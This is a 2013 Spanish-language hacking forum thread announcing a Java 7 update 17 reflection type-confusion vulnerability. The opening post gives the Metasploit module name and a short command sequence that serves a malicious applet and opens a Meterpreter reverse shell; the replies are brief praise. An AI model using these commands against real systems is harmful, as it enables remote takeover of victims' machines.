comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Nuevo Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]

  • 3 Respuestas
  • 1888 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Acidkode

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • 1f u c4n r34d th1s u r34lly n33d t0 g37 l41d
    • Ver Perfil
    • Email
« en: Abril 21, 2013, 06:56:14 pm »


Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores.

Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.

Aquí les dejo un video con la explotación con Metasploit:




comandos:

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo



fuente: http://eromang.zataz.com/

« Última modificación: Abril 21, 2013, 07:08:02 pm por ANTRAX »


Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Abril 21, 2013, 07:08:36 pm »
Excelente aporte!!
+ Karma!


Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Abril 22, 2013, 04:27:18 pm »
Exelente Aporte!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado M3XT4R

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
  • Nada es verdad, todo es posible...
    • Ver Perfil
« Respuesta #3 en: Abril 26, 2013, 11:47:02 am »
Muy bueno Thnks  ;)
M3X1C4N H4CK3R

#GrayHat

 

¿Te gustó el post? COMPARTILO!



Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2318
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
Explotando 0-day Java 7 Update 10

Iniciado por Anton

Respuestas: 4
Vistas: 2279
Último mensaje Agosto 05, 2013, 01:01:39 pm
por M5f3r0
Nuevo Meterpreter para Android

Iniciado por ZanGetsu

Respuestas: 2
Vistas: 2874
Último mensaje Enero 28, 2014, 08:44:45 am
por n4pst3r
Bug en Java 7

Iniciado por TrollMine

Respuestas: 1
Vistas: 1810
Último mensaje Septiembre 26, 2013, 06:59:38 pm
por ANTRAX
[Video/ing] Ms Word Office Silent Exploit Builder RECODED from scratch FUD 2016

Iniciado por simdia

Respuestas: 0
Vistas: 2148
Último mensaje Diciembre 25, 2015, 08:40:37 am
por simdia